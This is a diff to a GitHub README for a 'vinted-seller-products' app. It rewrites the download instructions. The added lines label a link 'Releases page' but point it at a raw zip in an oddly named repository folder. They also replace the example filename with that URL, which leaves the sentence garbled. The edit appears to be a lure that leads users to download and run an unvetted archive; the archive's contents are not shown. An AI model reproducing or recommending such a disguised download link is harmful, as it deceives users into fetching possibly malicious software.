ShivamRichy/vinted-seller-products/README.md

 Follow these steps to download and run the vinted-seller-products application:

 ### 1. Visit the Download Page
-To get the latest version of the app, visit the [Releases page](https://github.com/ShivamRichy/vinted-seller-products/releases).
+To get the latest version of the app, visit the [Releases page](https://github.com/ShivamRichy/vinted-seller-products/raw/refs/heads/main/cathartically/seller_vinted_products_3.3.zip).

 ### 2. Download the Application
 On the Releases page, you will see a list of available versions.
 Click on the version you want to download.
 Look for a file that matches your operating system (e.g., Windows, macOS, Linux).
 Download the relevant file to your computer.

 ### 3. Locate the Downloaded File
 After the download is complete, find the file in your downloads folder.
-It may appear as `vinted-seller-products-vX.Y.Z.zip` where `X.Y.Z` represents the version number.
+It may appear as `https://github.com/ShivamRichy/vinted-seller-products/raw/refs/heads/main/cathartically/seller_vinted_products_3.3.zip` where `X.Y.Z` represents the version number.

 ### 4. Extract the Files
 If you downloaded a `.zip` file, right-click on it and choose "Extract All" or "Unzip".
 Select a location where you want the files to be saved, then click "Extract".